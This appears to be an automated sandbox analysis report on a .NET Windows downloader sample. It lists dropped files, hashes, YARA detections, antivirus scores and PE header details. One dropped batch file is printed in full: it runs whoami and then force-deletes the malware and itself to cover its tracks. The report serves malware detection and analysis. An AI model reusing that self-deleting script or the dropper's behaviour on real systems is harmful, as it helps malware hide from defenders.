                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.9.2.4.<./.P.i.

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER1795.tmp.xml

                          Download File
                          Process:C:\Windows\System32\WerFault.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4737
                          Entropy (8bit):4.413381394335846
                          Encrypted:false
                          SSDEEP:96:uIjfaI7keAHem7VoJAONFONIWLONFONuun2d:uI2YkeAHem7+AONFONXONFONuunM
                          MD5:58EFF0A3736EC5467F91A216EDBB7B0D
                          SHA1:B8A207596F3C48811C4900313838DB15F5ED2432
                          SHA-256:EF1B76CA20551C37275E85CD8BEFB737D8767BBBFF8C8EC6F3EF66FA327E0853
                          SHA-512:95E2B393B40D42F4A058FB652B98978A0ECC3504C92BAC8D96930FBE4F8BFE154C5B1E2D4A6AF7C629CB8D63826AC3C2928C4C0F9CAFB06B124709BEEA9FE253
                          Malicious:false
                          Reputation:low
                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="383279" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER18AD.tmp.dmp

                          Download File
                          Process:C:\Windows\System32\WerFault.exe
                          File Type:Mini DuMP crash report, 16 streams, Tue Jun 25 12:56:21 2024, 0x1205a4 type
                          Category:dropped
                          Size (bytes):276034
                          Entropy (8bit):3.736028492520922
                          Encrypted:false
                          SSDEEP:1536:Y3SNc67f9SFEyyJ5S2cXoYKZ9jCC8jH/iE5/mXh5+vMF6e3dM9+x5AdUNFA82bIi:nTwF9cSPXo51CCq6qQ3+vc6eHcF4cE+
                          MD5:975BD88D821E66A3855D56EE68C21B55
                          SHA1:07FE5853348A12F10B7315DDECD2397A060B8CE5
                          SHA-256:C61B5523A4D1089E5EFA18989BC0EC38757E7EC9B7B6A27B4A39534D46C40EE4
                          SHA-512:D11DC517C0B6D195B3F5E033F222E2AD7549A9B310F4CDA235CC904254F24160D8C200B7511735E9A15BD31861F94A11969FD89FDE2A3007A00B49598AA4AA1D
                          Malicious:false
                          Reputation:low
                          Preview:MDMP..a..... .......u.zf....................................$............................B..........l.......8...........T............ ..............,............ ..............................................................................eJ....... ......Lw......................T...........u.zf............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER195A.tmp.WERInternalMetadata.xml

                          Download File
                          Process:C:\Windows\System32\WerFault.exe
                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):8542
                          Entropy (8bit):3.6944195299706766
                          Encrypted:false
                          SSDEEP:192:R6l7wVeJbeaE76Y9YdvgmfZp8rhIpDO89bkB5fSzMm:R6lXJiF6YCdvgmfHLkPfSt
                          MD5:20547D5D08D588B3258EA7A7CC863158
                          SHA1:E7DD0DCEE5F78F666DF351674E40119F857CAD1B
                          SHA-256:473AC994782D3C88E825B38CA8DB92AE98CE84415C1EEA3ECA53CABEE318324D
                          SHA-512:E9E49ABF320E84B2E4FE1E45FA292361EF90EFDE058DE16F09E981F46B3F6087E0545E381F9AB8F507642E53175FD3D2F7A3BF0E469FF81778A9C9AE9F89965D
                          Malicious:false
                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.7.6.<./.P.i.

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER1999.tmp.xml

                          Download File
                          Process:C:\Windows\System32\WerFault.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4737
                          Entropy (8bit):4.413408306953291
                          Encrypted:false
                          SSDEEP:96:uIjfaI7keAHem7VHJAONFONEfWLONFON1Wunld:uI2YkeAHem7rAONFONEGONFONQun7
                          MD5:F9595DBBFD1C43A1F929B963BCE3DAF3
                          SHA1:29C2F7D4636766BC413BD78A40AA5014790536B5
                          SHA-256:2D0619E3304C059F5753363367A082A1D53FB2CBB4E71B1270D395C4D6F2966E
                          SHA-512:081A24E7F236905C12611F4B866A96EAA4B4A5CD54E8591E1A64535AEAAEFFE815BFEAA3F8F7A8EB959AE388FAEC1E786754EBFC21143F607F1780CE92CF7B7B
                          Malicious:false
                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="383279" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER2B3B.tmp.dmp

                          Download File
                          Process:C:\Windows\System32\WerFault.exe
                          File Type:Mini DuMP crash report, 16 streams, Tue Jun 25 12:56:26 2024, 0x1205a4 type
                          Category:dropped
                          Size (bytes):617636
                          Entropy (8bit):3.142923694274219
                          Encrypted:false
                          SSDEEP:3072:v8MG9s5U4sPtF1cSonOFhk1CCqh3RW3+vqMPy+FcwHRANoVmfyBOXpIymdSZA6yR:v89ORqhhW3QtqAZzpshCv/
                          MD5:FDB7A5064DC9DD06E34F37BCA7EE0A24
                          SHA1:AF94BA9CDEB401F54C015D6B99C38BECB8783E79
                          SHA-256:4AF420FF9343DFC5C6FF5D18B8BF65987BFAD6B417F520221DFC69789815BB1A
                          SHA-512:4ED1BFAF42D4BF5D7883C10435942A0E9BDA9F5EB2328B7B03FC225984465E7B8C0B4D7DA8089721C4A9DA64F44E3E876C5E4FAF93FF14B8C1554FCB1E7249E9
                          Malicious:false
                          Preview:MDMP..a..... .......z.zf............$...........t#..D.......<.......................tP..x...........l.......8...........T...........x`..,............C...........E..............................................................................eJ.......F......Lw......................T.......p...W.zf.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D01.tmp.WERInternalMetadata.xml

                          Download File
                          Process:C:\Windows\System32\WerFault.exe
                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):6824
                          Entropy (8bit):3.7247199651382066
                          Encrypted:false
                          SSDEEP:192:R6l7wVeJdyTRYZHPKpry89b7ylBMf6zpm:R6lXJYFYJE7yl6f6A
                          MD5:E769EE8BC7A423BBCCCD831B7BE74712
                          SHA1:DB4F8FBB48E6C5F9067C95548D73871B6D60F248
                          SHA-256:2BC6CB8C7B271B1CBE223173892102E59629DCE39C34BB48FA698D8F021BD074
                          SHA-512:7909F5F03760378A86FDA121FB3F86244AC9793F273E4DF053EB1390D59ADE6C3424A6B610896F18C1AE0336E8AE2AC8BAFB7FC60A4F9D13A2F8E3B1B2BF45BB
                          Malicious:false
                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.3.6.<./.P.i.

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D40.tmp.xml

                          Download File
                          Process:C:\Windows\System32\WerFault.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4779
                          Entropy (8bit):4.44202668290334
                          Encrypted:false
                          SSDEEP:48:cvIwWl8zscJg771I9zeAHeXWpW8VYjYm8M4JAolNN48F+byq8vLolNN4y6FBnSd:uIjfaI7keAHem7VrJAONydWLONyyunSd
                          MD5:6FEBC99F2B96E6A5A81F0C7DDDFB25E6
                          SHA1:E42F4D262C3E669142D8365C82205E7AD5C8DEF8
                          SHA-256:7E026D3531F422E1319992A27B47B52A4ED933EA592582C271EC62B6A3CA62E3
                          SHA-512:D4DC54A7B5AC4F9AC086AE628A054E2F0101C02893FE8A54AD9C3912C54515A55A09897293F4384AF0A98555A1BC8EC95677A11864D0706926EF75849BA25518
                          Malicious:false
                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="383279" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER6CB.tmp.dmp

                          Download File
                          Process:C:\Windows\System32\WerFault.exe
                          File Type:Mini DuMP crash report, 16 streams, Tue Jun 25 12:56:21 2024, 0x1205a4 type
                          Category:dropped
                          Size (bytes):275778
                          Entropy (8bit):3.7419304342243453
                          Encrypted:false
                          SSDEEP:1536:fAzqUf9SFSyyJ5S219UcyZ9jCC8jH/imZemXh5+vM6FsxPHFP3dDoiKzx5AdZnej:fAmVFPcSgU91CCq64D3+vXIlPqbi4HSA
                          MD5:6BC41B54862FD5E33AEB9769C7635575
                          SHA1:28C239B5C61A29968AF95CE3415BB4370D53E8F3
                          SHA-256:C7F73F4F03F2FD7C71DCE9AEA40260BA786F8DAF285D15FB93DA233603E6504D
                          SHA-512:5F1E5834C759AA2FFC4D774EF76F307F9C5D90A5CACD8B460921B26603275230A25AA63BDACFF3298FED4647F4BE7EC508DDB6395D224D3B35F651CA516F3E08
                          Malicious:false
                          Preview:MDMP..a..... .......u.zf....................................$............................B..........l.......8...........T............ ..............,............ ..............................................................................eJ....... ......Lw......................T...........m.zf............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\ProgramData\uovan\svrreve.exe

                          Download File
                          Process:C:\Users\user\Desktop\ubes6SC7Vd.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):1972736
                          Entropy (8bit):6.157411768979153
                          Encrypted:false
                          SSDEEP:24576:Bp9JSZzPtEAPq07VFEJPPwLQk5V4yHEpfm:BpnSjEaRCVwd5Cykp
                          MD5:7DDECCF7C147EA2B90426AEB43277096
                          SHA1:A350F7403F25ADD29A464491D37F56B5381D4A73
                          SHA-256:F8880A50A9423AFAC856607F3A7A9759CE580FD71E8D92D480E6EC32A52378CB
                          SHA-512:2B0F23FDC66CFE90C329474669109320694107F140E5D3B95338833211B4C6FA58A627583BABD256FB045444F609020CE544C2A3C14E5D85C46EE76BC71CA7AF
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\ProgramData\uovan\svrreve.exe, Author: Joe Security
                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\uovan\svrreve.exe, Author: Joe Security
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 45%
                          • Antivirus: Virustotal, Detection: 56%, Browse
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...x"................0..l..........>.... ........@.. ....................................`....................................W.......H....................`....................................................... ............... ..H............text...Dj... ...l.................. ..`.rsrc...H............n..............@..@.reloc.......`......................@..B................ .......H.......h/..|Z....../....e..h...........................................A.B.C.D.E.F.G.H.I.J.K.L.M.N.O.P.Q.R.S.T.U.V.W.X.Y.Z.a.b.c.d.e.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v.w.x.y.z.0.1.2.3.4.5.6.7.8.9.-._..(u...*".("....*b.@.C...%.....(#........*Z.~.........s%........*.s.........*.(.....*^..}.....(_.......}....*.s.........*..*F......(K........*6.{"....o....*^.{#....o....o....o....*.s:....$...*".o.....*.*&.(".....*".......*b.@.C...%.....(#........*...(.........~....r...p(E........*

                          C:\ProgramData\uovan\svrreve.exe:Zone.Identifier

                          Download File
                          Process:C:\Users\user\Desktop\ubes6SC7Vd.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0

                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ubes6SC7Vd.exe.log

                          Download File
                          Process:C:\Users\user\Desktop\ubes6SC7Vd.exe
                          File Type:CSV text
                          Category:modified
                          Size (bytes):1492
                          Entropy (8bit):5.3787668257697945
                          Encrypted:false
                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhwE4k/1qE4GIs0E4KGAE4KKUNKKIE4TKBGKoM:MxHKQwYHKGSI6owH81qHGIs0HKGAHKKe
                          MD5:F275D52AB9901AC1E084FE432BE68AD1
                          SHA1:A05C42D898E8AC22C6F1B65B4DC04FD738E9963B
                          SHA-256:45BF2F8850914B408EB93C38835A4D5BCC92A311550C09E6D9E66CC1DB86557C
                          SHA-512:6622EA7B8E197C7F2E46A32F85C91E4AC49C8CAE453BBF55216BAFE1D84ADE208C3511545CBA8C62FD6B87B64D05C90FBB082F6B0D956576FD9FFBC214163C21
                          Malicious:true
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Net.Http\f4b68470ad08185826d827aa6e7875b6\System.Net.Http.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.F

                          C:\Users\user\AppData\Local\Temp\tmpFD97.tmp.bat

                          Download File
                          Process:C:\Users\user\Desktop\ubes6SC7Vd.exe
                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):159
                          Entropy (8bit):5.081361448502054
                          Encrypted:false
                          SSDEEP:3:mKDDCMNuwGv1h8mRDt+WfHvhs9Qg3JwDwU1hGDt+kiE2J5xAInTRIJKcIh1ZPy:hWKuZNOm1wQO9Qg3+DNewkn23fTNcW1k
                          MD5:9B3397E61B11AB36E9AACC7DE0DAF91C
                          SHA1:11165F9206D257834B54B0D05485E90FAC98CB56
                          SHA-256:98FD837717A5A22C361DBAE6B6EBEE89253C2C093D6C2D85149415CCE8D544D2
                          SHA-512:4447DFDCAFCE70A9D01814D411A73047F57E7E4B5769D39C4210776E2873C222BACF70113037300F5D79F47D1B33D5AC146AAD472CBDA4E53422E47C378328BB
                          Malicious:false
                          Preview:@echo off..timeout 7 > NUL..whoami..CD C:\Users\user\Desktop..DEL "ubes6SC7Vd.exe" /f /q..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpFD97.tmp.bat" /f /q..

                          C:\Windows\appcompat\Programs\Amcache.hve

                          Download File
                          Process:C:\Windows\System32\WerFault.exe
                          File Type:MS Windows registry file, NT/2000 or above
                          Category:dropped
                          Size (bytes):1835008
                          Entropy (8bit):4.465651773317116
                          Encrypted:false
                          SSDEEP:6144:zIXfpi67eLPU9skLmb0b4KWSPKaJG8nAgejZMMhA2gX4WABl0uNIdwBCswSb7:kXD94KWlLZMM6YFH++7
                          MD5:F0F54A59E74C2C733845737D561B70D7
                          SHA1:DF0BE581EA1946223936BA12CE1EB364247D0834
                          SHA-256:994A46D34E8F053F44679516C3E534111CC2D8C45B62B5DFC1F193EC7C66815E
                          SHA-512:B468248F08AA85D1FE7A6386C935CB1B8029A056A62E7A990498C84486BFC83074AEDB070C26B32737A422272B87FDC3108D996DA277667ED6C4976A4121C83F
                          Malicious:false
                          Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....................................................................................................................................................................................................................................................................................................................................................OY."........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                          \Device\Null

                          Download File
                          Process:C:\Windows\System32\timeout.exe
                          File Type:ASCII text, with CRLF line terminators, with overstriking
                          Category:dropped
                          Size (bytes):68
                          Entropy (8bit):4.551500018105127
                          Encrypted:false
                          SSDEEP:3:hYFxjZAR+mQRKVxLZTtcyn:hYFxaNZzn
                          MD5:C2690662A62F73771FDAFC602E8A707F
                          SHA1:C4B4AAA76D45FDEBCCA874D1307978D3520FDD9B
                          SHA-256:BEE86C0B0D8CEC1FE391CF8284CF6262BF2D8E97715C18CEF19BA62532E9AAAC
                          SHA-512:0CE9350E3B962098058B819F08A9A293DCECD19114BAB5E04623A826DA0407C927F49C0AEE76A46331A258AC86AB2463E84BCE4C5C5813E70663D5618B80D7F4
                          Malicious:false
                          Preview:..Waiting for 7 seconds, press a key to continue ....6.5.4.3.2.1.0..

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Entropy (8bit):6.157411768979153
                          TrID:
                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                          • Win32 Executable (generic) a (10002005/4) 49.78%
                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                          • Generic Win/DOS Executable (2004/3) 0.01%
                          • DOS Executable Generic (2002/1) 0.01%
                          File name:ubes6SC7Vd.exe
                          File size:1'972'736 bytes
                          MD5:7ddeccf7c147ea2b90426aeb43277096
                          SHA1:a350f7403f25add29a464491d37f56b5381d4a73
                          SHA256:f8880a50a9423afac856607f3a7a9759ce580fd71e8d92d480e6ec32a52378cb
                          SHA512:2b0f23fdc66cfe90c329474669109320694107f140e5d3b95338833211b4c6fa58a627583babd256fb045444f609020ce544c2a3c14e5d85c46ee76bc71ca7af
                          SSDEEP:24576:Bp9JSZzPtEAPq07VFEJPPwLQk5V4yHEpfm:BpnSjEaRCVwd5Cykp
                          TLSH:BC9509257A4A99ADC09AC4708346C6725A713CCA1B35B9FF44C49E7B3E79AF41F3C218
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...x"................0..l..........>.... ........@.. ....................................`................................

                          File Icon

                          Icon Hash:116d693231694461

                          Static PE Info

                          General

                          Entrypoint:0x5c8a3e
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Time Stamp:0x95B82278 [Fri Aug 6 14:23:52 2049 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                          Entrypoint Preview

                          Instruction
                          jmp dword ptr [00402000h]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
